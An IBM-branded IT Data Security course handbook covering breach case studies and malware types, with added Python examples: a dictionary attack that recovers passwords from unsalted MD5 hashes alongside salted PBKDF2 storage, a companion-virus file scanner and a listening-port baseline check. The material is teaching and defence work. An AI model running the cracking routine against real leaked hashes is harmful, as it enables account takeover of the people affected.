Countermeasures (52 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-74
Countermeasures (53 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-75
Countermeasures (54 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-76
Countermeasures (55 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-77
Checkpoint (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-79
Checkpoint (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-80
Checkpoint (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-81
Checkpoint (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-82
Unit summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-83

Appendix A. Checkpoint solutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A-1

Appendix B. Title . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B-1

Trademarks
The reader should recognize that the following terms, which appear in the content of this training
document, are official trademarks of IBM or other companies:
IBM, the IBM logo, and ibm.com are trademarks or registered trademarks of International Business
Machines Corp., registered in many jurisdictions worldwide.
The following are trademarks of International Business Machines Corporation, registered in many
jurisdictions worldwide:
HACMP™ Power®
Linux is a registered trademark of Linus Torvalds in the United States, other countries, or both.
Microsoft and Windows are trademarks of Microsoft Corporation in the United States, other
countries, or both.
Java™ and all Java-based trademarks and logos are trademarks or registered trademarks of
Oracle and/or its affiliates.
UNIX is a registered trademark of The Open Group in the United States and other countries.
Skimmer® is a trademark or registered trademark of IBM International Group B.V., an IBM
Company.
Evolution® is a trademark or registered trademark of Kenexa, an IBM Company.
Other product and service names might be trademarks of IBM or other companies.

Course description
IT Data Security

Duration: 4 days

Purpose
This course is designed to give students a working knowledge of the threats, threat
techniques and associated countermeasures in IT Data Security. It also helps students
understand how an activity monitoring tool works.

Audience
Bachelor of Technology (B.Tech) Students.

Prerequisites
Basic Internet knowledge

Objectives
After completing this course, you should be able to:
• Understand the background of Data Security
• Recognize and classify different threats and the associated threat techniques
related to Data Security
• Identify and understand the steps involved in various attacks
• Understand the trends in emerging threats
• Recognize the importance of information protection
• Enumerate the countermeasures associated with the different fields of Data
Security
• Use the InDefend (Activity Monitoring) tool

Contents
Unit 1 - Data Security Threats
Unit 2 - Data Security Threat Techniques
Unit 3 - Countermeasures

Unit 1. Data Security Threats

What this unit is about


This unit is about
• Background of Data Security
• Data Security need and associated threats
• Classification of Data Security Threats

What you should be able to do


After completing this unit, you should be able to:
• Understand the background of Data Security
• Recognize various associated threats
• Classify different threats associated with Data Security

How you will check your progress


• Checkpoint

References
Norman, "Assessing Vulnerability", Risk Analysis and Security Countermeasure Selection,
2009
http://www.microsoft.com/technet/security/bestprac/bpent/sec1/secthret.mspx
http://www.giac.org/paper/gsec/4152/identity-theft-attacks-countermeasures/106663
http://www.nsf.gov/oig/identitytheft.pdf
http://www.ils.unc.edu/~wenyang/inls258/wenyang.htm


IBM ICE (Innovation Centre for Education)

Welcome to:

IT Data Security – Data Security Threats

© Copyright IBM Corporation 2015

Figure 1-1. IT Data Security – Data Security Threats DS011.0


Unit objectives

After completing this unit, you should be able to:


• Understand the background of Data Security
• Recognize various associated threats
• Classify different threats associated with Data Security


Figure 1-2. Unit objectives DS011.0


Background

• Data protection is needed not only to protect the data on a system from cyber-attacks
or malware, but also to ensure that if it does find its way into the wrong hands it
remains secure and cannot be read

• Data protection comprises many elements, including where the data resides, how it is
used and who has access to it

• For any organization, data security is a vital issue. It can suffer serious consequences
if a user who is not authorized to access its data gets into its systems


Figure 1-3. Background DS011.0

Notes:

Background
In this digital and interconnected era, organizations hold and exchange vast amounts of data relating to
employees and consumers. Whether a company obtains that data from other companies in its role as a
service provider, or is itself the owner of the data, it is now well understood that companies that collect,
maintain or use personal information have a serious responsibility to protect the security and integrity of that
information. Data protection is needed not only to protect the data on a system from cyber-attacks or
malware, but also to ensure that if it does find its way into the wrong hands it remains secure and cannot be
read (in practice this means encrypting it). Data protection comprises many elements, including where the
data resides, how it is used and who has access to it. Risk comes from both inside and outside the
organization: from employees and third-party vendors, and from cyber criminals looking for financial gain or
seeking to damage, intentionally or unintentionally, an organization's reputation. For any organization, data
security is a vital issue. It can suffer serious consequences if a user who is not authorized to access its data
gets into its systems. The value of data can be understood by examining the critical data held by both
individuals and businesses. Most critical data, such as salary information, business plans, financial results
and employee records, is held by organizations. They also hold research data, trade secrets and other
valuable information that gives them an edge over their competitors. Individuals keep personal data on their
own computers and also perform functions online such as shopping and social networking, and they share
sensitive data with others. Much of this data is stored on, or transmitted over, the Internet as it is shared and
processed, which increases the risk of it being leaked.


Case Study 1

• Overview
 – Managing and protecting data is a necessary part of an organization's contingency plan

 – A data breach can cause very large financial penalties, reputation loss and expensive lawsuits for any
organization

 – It can also have a serious impact on individuals, whose identity can be stolen and whose credit rating
or financial history can be badly damaged


Figure 1-4. Case Study 1 DS011.0

Notes:
Case Study

Overview
Managing and protecting data is a necessary part of an organization's contingency plan. If the data it holds is
exposed because it was not adequately protected, the event is known as a data breach. The consequences of
a data breach can be severe. It can cause very large financial penalties, reputation loss and expensive
lawsuits for any organization. It can also have a serious impact on individuals, whose identity can be stolen
and whose credit rating or financial history can be badly damaged. Recovering from a data breach can take
many years and involve huge costs. The section below gives some examples of data breaches:


Case Study 2

• eBay

• Sony

• Gaana.com

• BlueCross BlueShield

• Methodist Hospital


Figure 1-5. Case Study 2 DS011.0

Notes:
Case Studies
eBay: One of the biggest data breaches reported was at eBay. Attackers compromised the login credentials
of a small number of employees, which allowed them to gain access to the organization's network. This was
carried out between late February and early March 2014. A database containing customer names, e-mail
addresses, physical addresses, hashed passwords (described by eBay as encrypted) and other details was
compromised. The organization has a staggering number of members, and the information of all of them was
affected by this breach. As a countermeasure, the organization asked all its users to change their passwords.
Sony: Sony was also hacked in recent years and large amounts of its confidential data were leaked. There
have been numerous other cases where an organization was seriously damaged by the hacking or breach of
its confidential data. Clearly, cyber security is still a significant issue that needs to be addressed.
Gaana.com: Gaana.com, one of India's most popular music streaming services, with more than 10 million
registered users and 7.5 million monthly visitors, was reportedly hacked in May 2015, exposing the site's user
information database. A Pakistani hacker who claimed responsibility said that details of over 10 million users
of the Gaana service, including usernames, e-mail addresses, MD5-hashed passwords, dates of birth and
other personal information, had been stolen and made available in a searchable database. Note that MD5 is
a fast hash function, not encryption: an unsalted MD5 password hash can be reversed for most common
passwords with a precomputed lookup table, so such a leak effectively exposes the passwords themselves.
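To make the point about MD5 concrete, here is an added example, written for this edition of the notes and not taken from the course material or from any of the services named above. It runs the attack a buyer of such a dump would run against unsalted MD5 digests, then stores the same passwords with a salted, iterated hash (PBKDF2-HMAC-SHA256 from Python's standard library) to show why the attack stops working. All user records, passwords and the wordlist are constructed for the example, and the iteration count is an assumed value, not one taken from any real system.

```python
import hashlib
import hmac
import os

# Constructed sample rows in the shape a leaked user table takes:
# (username, e-mail, unsalted MD5 hex digest). Accounts and passwords are invented.
LEAKED_ROWS = [
    ("alice", "alice@example.com", hashlib.md5(b"password123").hexdigest()),
    ("bob", "bob@example.com", hashlib.md5(b"letmein").hexdigest()),
    ("carol", "carol@example.com", hashlib.md5(b"c0rr3ct-h0rse-b4ttery").hexdigest()),
]

# Constructed stand-in for a cracking wordlist; real ones hold millions of entries.
WORDLIST = ["123456", "password", "password123", "letmein", "qwerty", "iloveyou"]


def crack_unsalted_md5(rows, wordlist):
    """Recover plaintexts from unsalted MD5 digests by table lookup.

    MD5 is computed once per wordlist entry, then every row in the dump is a
    dictionary lookup, so the cost is O(len(wordlist)) for the whole dump no
    matter how many users it holds. Users whose password is not in the list
    map to None.
    """
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(digest) for user, _email, digest in rows}


def hash_password(password, salt=None, iterations=600_000):
    """Store a password as 'salt$iterations$digest' with PBKDF2-HMAC-SHA256.

    A random per-user salt defeats the shared lookup table above (each user
    would need a table of their own) and the iteration count, an assumed
    value for this example, makes each guess cost hundreds of thousands of
    hash operations instead of one.
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the digest with the stored salt and iteration count and
    compare in constant time so the comparison leaks no timing information."""
    salt_hex, iterations, digest_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), digest_hex)


def crack_salted(rows, wordlist):
    """The same dictionary attack against salted PBKDF2 records.

    rows are (username, e-mail, stored) tuples as produced by hash_password.
    Returns (recovered, kdf_calls): the lookup-table shortcut no longer works,
    so the attacker pays one full KDF run per (user, guess) pair.
    """
    recovered, kdf_calls = {}, 0
    for user, _email, stored in rows:
        recovered[user] = None
        for guess in wordlist:
            kdf_calls += 1
            if verify_password(guess, stored):
                recovered[user] = guess
                break
    return recovered, kdf_calls


if __name__ == "__main__":
    print("unsalted MD5:", crack_unsalted_md5(LEAKED_ROWS, WORDLIST))
    # Re-store the same three passwords properly (low iteration count so the demo is quick).
    plaintexts = {"alice": "password123", "bob": "letmein", "carol": "c0rr3ct-h0rse-b4ttery"}
    salted_rows = [(u, e, hash_password(plaintexts[u], iterations=10_000))
                   for u, e, _d in LEAKED_ROWS]
    recovered, calls = crack_salted(salted_rows, WORDLIST)
    print("salted PBKDF2:", recovered, "after", calls, "KDF runs")
```

The lesson for the case above: against unsalted MD5 the attacker pays once per wordlist entry for the entire dump, however many million rows it has; against a per-user salt and a high iteration count the attacker pays hundreds of thousands of hash operations for every user and every guess. Where a library is available, a dedicated password hash such as bcrypt or Argon2 is preferable to PBKDF2, but even the standard-library version shown here removes the shortcut that made the Gaana dump so damaging.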


BlueCross BlueShield: BlueCross BlueShield of Tennessee reported the theft of 57 computer hard drives
from a training facility. BCBS initially reported that the drives did not contain personal information and that
they were encrypted, but later rescinded both statements. To date it has spent more than $7 million
recovering from the breach, including credit monitoring services for the 220,000 people affected and 700
employees working to identify the details of the breach.
Methodist Hospital: The Methodist Hospital in Houston, Texas reported the theft of a laptop from a medical
office in the Texas Medical Center. The laptop was attached to a medical device that tests pulmonary function,
and contained private health information and Social Security Numbers of 689 people. The hospital offered
those affected a one-year free subscription to credit monitoring and identity theft protection.


Case Study 3

• Health Net

• Michaels Stores

• Variable Annuity Life Insurance Co.


Figure 1-6. Case Study 3 DS011.0

Notes:

Case Study
Health Net: The Connecticut Attorney General sued Health Net, claiming the insurance company failed to
adequately protect the medical records of 446,000 patients whose private data was stored on a missing disk
drive, and waited six months to notify customers of the breach. The missing disk contained health information,
Social Security Numbers and bank account numbers.
Michaels Stores: Between May 2013 and January 2014, the point-of-sale systems at Michaels stores were
attacked by criminals using sophisticated malware. About 2.6 million payment card numbers were leaked
during this attack.
Variable Annuity Life Insurance Co.: Data belonging to the Variable Annuity Life Insurance Company was
leaked by a former financial advisor. The advisor had a thumb drive holding information on 774,723 customers
of the organization, including Social Security Numbers. The thumb drive was returned to the organization after
it obtained a search warrant against the advisor. Although the company believed the data on the thumb drive
had not been used, it was still a serious incident. Threats to sensitive data have reached a critical point, with
the sophistication and frequency of attacks escalating over the last several years. It is imperative that
organizations implement security solutions that not only protect important data assets but also satisfy the
compliance mandates to which they are held accountable. Reaching the appropriate balance between ease
of communication and strong protection of sensitive information is one of the most significant challenges
faced by today's business network and security teams.


Need of Data Security (1 of 2)

• An organization cannot run without a proper data security mechanism in place

• Every organization today holds its data in digital form, which, if not protected, can have a
catastrophic effect on the business continuity of the organization

• Data security is extremely important for all companies, large and small. On an almost daily
basis, data theft occurs at a multitude of companies, either by accident or on purpose


Figure 1-7. Need of Data Security (1 of 2) DS011.0

Notes:

Need of Data Security


With the increasing number of data breaches in all sections of society, the need to secure data has grown.
An organization cannot run without a proper data security mechanism in place. Every organization today
holds its data in digital form, which, if not protected, can have a catastrophic effect on the business continuity
of the organization. Data security is therefore not a nice-to-have but a must-have. The following sections list
the factors that have increased the need for data security in corporations and in health institutions. Data
security is extremely important for all companies, large and small. On an almost daily basis, data theft occurs
at a multitude of companies, either by accident or on purpose. Such breaches can put the information of
thousands of consumers at risk, or enable competitors to access confidential information.


Need of Data Security (2 of 2)

• The process of protecting massive amounts of data or information which an organization may
want to keep confidential and protected from others is known as Business Data Protection

• Often, organizations struggle to create real-time security policies as the data keeps growing

• While data breaches affect businesses of all sizes, many small business owners aren’t taking
the necessary steps to create ongoing data security policies and practices, including training
their employees


Figure 1-8. Need of Data Security (2 of 2) DS011.0

Notes:

Need of Data Security


Most businesses have massive amounts of data or information that they may want to keep confidential and
protected from others. The process of protecting this kind of data is known as Business Data Protection.
Organizations often struggle to create real-time security policies as their data keeps growing, and find it hard
to monitor all of their data from one central location on big data platforms. Information such as client details,
bank details, account details and personal files must be well protected, because if it gets into the wrong
hands it can easily be misused. Such information can be hard to replace and is potentially dangerous in the
wrong hands. By securing it, an organization protects its files and avoids these difficulties. While data
breaches affect businesses of all sizes, many small business owners are not taking the necessary steps to
create ongoing data security policies and practices, including training their employees. Many small business
owners recognize the importance of data security but do not understand how vulnerable they really are, may
feel intimidated by the issue, or think that they lack the resources to implement a sound strategy. As a result,
data thieves often target small businesses, stealing the sensitive financial information of both the business
and its customers.


Importance of Data Security

• Reputational Advantage

• Dynamic Threats Paradigm

• Ongoing productivity


Figure 1-9. Importance of Data Security DS011.0

Notes:

Introduction
Reputational Advantage: The reputation an organization builds over the years can be shattered in a single
stroke if a data breach takes place. The data an organization possesses includes confidential information
about its customers or clients, and once that data is lost it may have no adequate explanation to offer them.
Dynamic threats paradigm: Another reason why data security is important is that threats are increasing, and
without securing data one cannot expect to run a business, or even carry on as a home PC user. This is
driven by the emergence of mobile devices, the Internet, cloud computing and similar technologies.
Ongoing productivity: A company-wide understanding of the importance of data protection means that an
organization's workforce will be more aware of the risks of data loss. Without regular backups of company
data it will not be long until a key set of files is lost, productivity stops and an embarrassed phone call to
customers follows. Backups only count if restores are tested regularly and at least one copy is kept out of
reach of whatever could corrupt the primary data. A data protection policy is as much about being able to
recover important customer-related data as it is about stopping data from being exposed.


Critical Data for Organizations

• Customer Information
 – Data about its customers should be an organization's top priority

• Product Information
 – Protecting information about existing products and products about to be launched is a high priority
for many organizations

• Employee Information
 – Most organizations hold detailed personal information about their employees

• Company Information
 – An organization has various critical data that it needs to protect


Figure 1-10. Critical Data for Organizations DS011.0

Notes:
Critical data for organizations: In order to secure data, an organization must first understand which pieces
of information need to be protected. After identifying the information of critical value, proper safeguards and
procedures must be put in place to keep it safe. Below are some examples of the critical information a
company possesses which must be protected:
• Customer Information: For any organization, data about its customers should be the top priority. The
organization's business will not flourish if customers lose trust in it. If critical data belonging to customers is
lost, their business will go to a competing organization. Data security is therefore very important to keep
customer information secure.
• Product Information: Protecting information about existing products and products about to be launched is
a high priority for many organizations. If competing companies learn about a product that the organization is
about to launch, this could be a big loss. Companies therefore need to implement data security to protect
information about their products.
• Employee Information: Most organizations hold detailed personal information about their employees, such
as addresses, employment records, social security numbers and telephone numbers. Data security is
therefore very important in order to protect employee information.
• Company Information: An organization has various critical data that it needs to protect. This may include
financial information, R&D papers and other valuable data that concerns the business. The organization's
reputation may be harmed if this critical data is accessible to a user who is not authorized. Protecting
information associated with an organization is therefore very important.

Elements to consider for a better security mechanism

• Cost
 – Cost plays an important role

• The Price of Disruption
 – An organization must always choose the option that causes the least disruption while
implementing a data security mechanism

• What is to lose
 – The security needs of an organization must be of utmost priority if its business relies on the trust of
its customers

• Where the potential threats are
 – An organization should always consider the biggest threats that its sensitive data faces


Figure 1-11. Elements to consider for a better security mechanism DS011.0

Notes:
Elements to consider for a better data security mechanism
Below are the elements that need to be considered in order to set up a better mechanism to secure data:
• Cost: Cost plays an important role in an organization's data protection. The organization has to make
sure that the amount of money invested in protecting data is not more than the value of what it is
protecting.
• The Price of Disruption: An organization must always choose the option that causes the least disruption
while implementing a data security mechanism. Elements such as the usual workflow and the way
employees work must be considered when employing security measures.
• What is to lose: The security needs of an organization must be of utmost priority if its business relies on
the trust of its customers. It should always be noted that organizations have more than money to lose
when it comes to security breaches.
• Where the potential threats are: An organization should always consider the biggest threats that its
sensitive data faces. This consideration should be made before it invests in security measures. If an
organization identifies its weakest points, it will know exactly what type of security measures to
implement and where to implement them.
It does not matter whether an organization is small or large; it cannot ignore security. It only takes one
betrayed customer to destroy the reputation of an organization. If an organization thinks that it will not fall
prey to a cyber-attack, it is gambling with its entire business. It can be far more confident about the critical
data it possesses if it puts a few basic security measures in place.


Process 1

• Overview
 – The data possessed by an organization is the most critical thing it needs to protect
 – There are many reasons for data getting lost; for example, it can be deleted intentionally or
unintentionally

• Definition
 – Data security refers to the protective measures applied to prevent unauthorized access to
computers, databases and websites. Data security also protects data from corruption. Data
security is a main priority for organizations of every size and type


Figure 1-12. Process 1 DS011.0

Notes:

Process: The data possessed by an organization is the most critical thing it needs to protect. It is more
valuable than the computer software and hardware that the organization owns. If there is a problem with the
software or the hardware, it can be repaired or replaced; but if critical data is lost, it takes time, money and
effort to recover it. Securing the data it possesses must be the top priority of an organization.
There are many reasons for data getting lost; for example, it can be deleted intentionally or unintentionally.
Data lost to disasters such as a flood or fire is crushing, but losing it to hackers or a malware infection can
have much greater consequences. Data is one of the most important assets of any organization, and people
are usually considered the weakest link in the security chain. It is of the utmost importance that internal staff
are made fully aware of their collective responsibility through education and regular reminders, so that the
importance of data security is not forgotten or overlooked. Each employee must be fully aware of his or her
own responsibilities, their restrictions on data access, and the disciplinary action that would be taken for any
breach of security. These can all serve as the driving force for self-improvement in terms of data security. For
any organization data is very important; whether it is customer, corporate or employee data, it should be
protected at all costs. The data of an organization faces many internal and external threats, and users can
cause huge losses to the organization if confidential data is not secured properly. Data security refers to the
protective measures applied to prevent unauthorized access to computers, databases and websites. Data
security also protects data from corruption. Data security is a main priority for organizations of every size and
type.


Process 2


Figure 1-13. Process 2 DS011.0

Notes:
This slide shows the lifecycle of data security. Explanation of the data security lifecycle has been provided in
the next slide.


Process 3

• Explanation
– Data security is a critical consideration for any organization

– Data security is especially important for state agencies, where the public's trust is essential for the
efficient delivery of services

– Security can be a significant investment, which adds to an already long list of administrative duties

– The focus behind data security is to ensure privacy while protecting personal or corporate data

– Data security deals with the protection of a database from any kind of actions or forces that can be
dangerous for the database


Figure 1-14. Process 3 DS011.0

Notes:
Process: Data security is a critical consideration for any organization that depends on information systems
and networks to meet its mission or business objectives. Data security is especially important for state
agencies, where the public's trust is essential for the efficient delivery of services. Security can be a
significant investment, which adds to an already long list of administrative duties. Managing secure networks,
developing and implementing new system functionality, maintaining thousands of system users, and other
day-to-day security tasks can strain limited administrative resources. However, agency management must
understand that proper protection of citizens' information is a requirement and not a luxury in the current
interconnected cyber environment. Data security is the practice of keeping data protected from corruption and
unauthorized access. The focus of data security is to ensure privacy while protecting personal or corporate
data. Applied to a database, data security means protecting the database from any action or force that could
damage it; at bottom it is securing data against access by unauthorized users. The term data protection is
used in two senses. Firstly, it may be used as a synonym for data security. Secondly, it may be used for
ensuring the availability of data for access, that is, backup and recovery. Data security is commonly defined in
terms of the confidentiality, integrity and availability of data: all of the practices and processes in place to
ensure data is not used or accessed by unauthorized individuals or parties (confidentiality), that it is accurate
and reliable (integrity), and that it is available when those with authorized access need it (availability). A data
security plan includes facets such as collecting only the required information, keeping it safe, and destroying
any information that is no longer needed. These steps help any business meet the legal obligations of
possessing sensitive data.


Types of Data Security Threats

• Malware Threats
 – Malicious software, or malware, refers to a broad category of software threats to any network and
system, including viruses, Trojan horses, logic bombs and worms

 – Users in an organization need help to fend off these attacks and keep the organization's systems
safe from damage

 – Attacks like these can spread through the entire network and can be devastating to the systems
on it

 – The Conficker worm of late 2008 is considered one of the largest worm infestations to date, and
variants of it are still on the Internet and propagating


Figure 1-15. Types of Data Security Threats DS011.0

Notes:
Types of Data Security Threats
With the ever-increasing use of computer technology, threats to the data stored on computers have also
increased. Computer usage in society has grown substantially, but users also need to be better equipped to
meet the challenges that come with this new era. New data security threats have evolved, making data more
vulnerable to attack. The sections below discuss these threats to data security in more detail.
Malware threats
Malicious software, or malware, refers to a broad category of software threats to any network and system,
including viruses, Trojan horses, logic bombs and worms. Users in an organization need help to fend off these
attacks and keep the organization's systems safe from damage. Attacks like these can spread through the
entire network and can be devastating to the systems on it. The Conficker worm was one such threat: it spread
rapidly through PCs running Microsoft Windows in late 2008, initially by exploiting a Windows Server service
vulnerability for which Microsoft had already issued a patch (MS08-067), and it is considered one of the
largest worm infestations to date; variants of it are still on the Internet and propagating. The following slides
describe these types of malware and the threats they pose in more detail.


Malware Threat (1 of 7)

• Virus
– A program written to change the operation of a computer without the knowledge or permission of
the user is a virus

– A computer system can be infected by a virus. It may reside on a computer and damage the data on
the computer system's hard drive

– The virus may also destroy the operating system of the computer and can spread to other systems
which are connected to that device


Figure 1-16. Malware Threat (1 of 7) DS011.0

Notes:
Virus: A program written to change the operation of a computer without the knowledge or permission of the
user is a virus. It replicates itself and damages the systems it reaches in the process. A computer system can
be infected by a virus. It may reside on a computer and damage the data on the computer system's hard
drive. The virus may also destroy the operating system of the computer and can spread to other systems
which are connected to that device. There are three ways in which a virus can get into a computing system:
- Through social networking sites and email
- Through corrupt media (CD-ROM, USB drive or DVD)
- Through another program
A virus can take many forms. The section below introduces all of these forms and also explains how they
corrupt a system.


Malware Threat (2 of 7)


Figure 1-17. Malware Threat (2 of 7) DS011.0

Notes:
The figure shows the different types of virus which can damage a computing system. The types of virus
shown in the diagram are explained in the next slides.


Malware Threat (3 of 7)

• Armored Virus
– These viruses use protective code to cover themselves in order to prevent disassemblers or debuggers
from examining their critical elements

• Companion Virus
– This kind of virus creates a program within the system which has a different file name extension, after
attaching itself to legitimate programs

• Macro Virus
– This virus exploits the macro facilities which programmers use to extend an application's capabilities

• Phage Virus
– Databases and programs are altered and modified by a phage virus. All the files present in the
database are infected by this virus


Figure 1-18. Malware Threat (3 of 7) DS011.0

Notes:
The working of these viruses is explained below.
Armored Virus: Detecting or analyzing an armored virus is very difficult because of the way it is built. It uses
protective code to cover itself in order to prevent disassemblers or debuggers from examining its critical elements.
It is written in such a way that most of the program is decoy code that distracts analysis, so deconstructing the
virus takes more time. The longer it can stay on the device, the more time it has to make copies and spread to
other systems. To stop this type of virus from hampering the system, it has to be identified quickly, and
administrators must be educated about it.
Companion Virus: This kind of virus creates a program within the system which has a different file name extension,
after attaching itself to legitimate programs. The usual place where this kind of file may reside is the temporary
directory of the system. Now, when the user types the name of the legitimate program, the companion will be
executed instead of the real program. In this way the virus is effectively hidden from the user.
Macro Virus: This virus exploits the macro facilities which programmers use to extend an application's capabilities.
The enhancements of the application programs are exploited. These programs include Word, Excel etc. For example,
a macro, which is a program inside a Word document, can tell the word processor to spell check a certain document
at the time the document is opened. In this way it can infect all the documents that are available on the system. The
virus can also spread to other systems in the network by way of email or other methods.
Phage Virus: Databases and programs are altered and modified by a phage virus. All the files present in the
database are infected by this virus. The only way to get rid of this virus is to re-install the program. The virus will
start to corrupt the system again if even a single instance associated with the virus is missed on the victim system.
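A companion virus works through name resolution: two files share a base name but carry different executable extensions, and the one that is launched when a bare name is typed may be the planted file rather than the legitimate program. A defender can look for exactly that condition on disk. The following Python script is an added example for this section, not code from the course material; the extension resolution order and the planted `report.com` / `report.exe` pair in the demonstration directory are constructed.

```python
"""Flag 'companion' executables: files sharing a base name with another
program but carrying a different executable extension, so that typing the
bare name may run the wrong file. Added illustration; the extension order
and the demo directory contents are constructed."""
import os
import tempfile
from collections import defaultdict

# Extensions treated as executable, in the order a command interpreter would
# try them when only a bare name is typed (constructed, DOS/Windows-style).
EXEC_EXTENSIONS = [".com", ".exe", ".bat", ".cmd"]


def find_companions(filenames):
    """Return a sorted list of (stem, [ext, ...]) for every base name that
    exists with more than one executable extension. The extension list is
    ordered by resolution order, so exts[0] is the file that would run."""
    by_stem = defaultdict(list)
    for name in filenames:
        stem, ext = os.path.splitext(name)
        ext = ext.lower()
        if ext in EXEC_EXTENSIONS:
            by_stem[stem.lower()].append(ext)
    findings = []
    for stem, exts in by_stem.items():
        if len(exts) > 1:
            exts.sort(key=EXEC_EXTENSIONS.index)
            findings.append((stem, exts))
    return sorted(findings)


def scan_directory(path):
    """Walk a directory tree and report companion pairs, keyed by directory."""
    report = {}
    for root, _dirs, files in os.walk(path):
        hits = find_companions(files)
        if hits:
            report[root] = hits
    return report


def demo():
    """Build a constructed temporary directory with one planted companion pair
    and return the scan report for it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("report.exe", "report.com", "backup.bat", "notes.txt"):
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(b"placeholder content")
        return scan_directory(tmp)


if __name__ == "__main__":
    for directory, hits in demo().items():
        for stem, exts in hits:
            print(f"{directory}: '{stem}' resolves to {exts[0]} ahead of {exts[1:]}")
```

Run on a real system, `scan_directory` would be pointed at the temporary directories and program folders the text names; every hit is a candidate for comparison against the software inventory, not proof of infection.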


Malware Threat (4 of 7)

• Multipartite Virus
– As the name suggests, a multipartite virus can attack a system in multiple ways

• Polymorphic Virus
– This virus attacks a system by displaying a message and then starts to delete all the files that are on
the system

• Retro Virus
– This type of virus is also known as an anti-antivirus, as it tries to bypass the antivirus which has
been installed on the system

• Stealth Virus
– This virus attaches to the hard drive's boot sector and redirects all the commands that are around it
when a system program or utility runs


Figure 1-19. Malware Threat (4 of 7) DS011.0

Notes:
The working of these viruses is explained below.
Multipartite Virus: As the name suggests, a multipartite virus can attack a system in multiple ways, for
example by infecting the boot sectors or the executable files. It can also destroy the application files that are
available on the system. These viruses attack the boot sectors and corrupt the whole system.
Polymorphic Virus: In order to avoid detection, a polymorphic virus changes its form. This virus attacks a
system by displaying a message and then starts to delete all the files that are on the system. It also attempts
to stay hidden from the antivirus software that is installed. In order to do so, the virus encrypts some part of
its code. This process is called mutation. It makes detection of the virus by its common characteristics hard
for any antivirus software. Fig. 3 explains the working of a polymorphic virus.
Retro Virus: This type of virus is also known as an anti-antivirus, as it tries to bypass the antivirus which has
been installed on the system. This virus can destroy the virus-definition database of an antivirus and so
bypass it. If the knowledge about viruses possessed by the antivirus is destroyed, then it will have no clue
about the type of virus entering the system.
Stealth Virus: This virus masks itself from other applications in order to avoid detection. It attaches to the
hard drive's boot sector and redirects all the commands that are around it when a system program or utility
runs. During a virus scan, the stealth virus moves itself from one file to another, which allows it to avoid
detection.


Malware Threat (5 of 7)

• Trojan
– Trojan horses use the identity of other programs to enter a system or a network

– A valid program can be replaced by a Trojan horse during its installation

– After it has taken the identity of another program it would accomplish its mission to corrupt the system

– In case a Trojan horse is detected the whole program must be reinstalled immediately


Figure 1-20. Malware Threat (5 of 7) DS011.0

Notes:
Trojan: Trojan horses use the identity of other programs to enter a system or a network. They may be
included as part of an installed program or an attachment. A valid program can be replaced by a Trojan
horse during its installation, creating a back door. After it has taken the identity of another program, it carries
out its mission to corrupt the system. Trojans can exist on a system for many years before they are detected.
The best way to counter them is to not let them enter the system in the first place. Any new operating system
or software must be backed up immediately after it is installed. In case a Trojan horse is detected, the whole
program must be reinstalled immediately; this also works as a counter against it. Another way to detect a
Trojan is to do a port scan. If the port scan shows a UDP or TCP port opened by an application that is not
normally present on the network, then there is a possibility that a Trojan horse is present on the system.
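The notes recommend a port scan to spot an application listening where none normally does. The script below turns that advice into a repeatable check: it parses a listing of listening sockets and reports any that are absent from an approved baseline. It is an added example and not part of the course material; the listing format (protocol, local address, owning process) is a constructed, simplified one rather than the output of any particular tool, and the baseline is an assumed allowlist for one host.

```python
"""Compare a host's listening sockets against an approved baseline and report
anything new. Added illustration: the socket listing is a constructed,
simplified format and the baseline is an assumed allowlist."""

# Approved (protocol, port, process) tuples for this host (assumed baseline).
BASELINE = {
    ("tcp", 22, "sshd"),
    ("tcp", 443, "nginx"),
    ("udp", 123, "chronyd"),
}

# Constructed listing, one socket per line: proto local_address process
SAMPLE_LISTING = """\
tcp 0.0.0.0:22 sshd
tcp 0.0.0.0:443 nginx
udp 0.0.0.0:123 chronyd
tcp 0.0.0.0:4444 updater
udp 0.0.0.0:53 dnsmasq
"""


def parse_listing(text):
    """Yield (proto, port, process) for each well-formed line of the listing."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # constructed format has exactly three fields per line
        proto, addr, proc = parts
        port = int(addr.rsplit(":", 1)[1])  # handles IPv4 and [::]:port forms
        yield proto, port, proc


def unexpected_listeners(text, baseline=BASELINE):
    """Return listeners not present in the baseline, sorted for stable output."""
    return sorted(set(parse_listing(text)) - set(baseline))


if __name__ == "__main__":
    for proto, port, proc in unexpected_listeners(SAMPLE_LISTING):
        print(f"unexpected {proto}/{port} owned by {proc}")
```

A deviation from the baseline is a prompt to identify the owning process and decide whether the baseline or the host is wrong; the check is only as good as the baseline, so it must be updated whenever approved software changes.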


Malware Threat (6 of 7)

• Adware
– Adware is a type of spyware used by marketers to track Internet users' habits and interests

– The information is then used to customize future advertisements directed to the user, or can be sold
to a third party for the same purpose


Figure 1-21. Malware Threat (6 of 7) DS011.0

Notes:
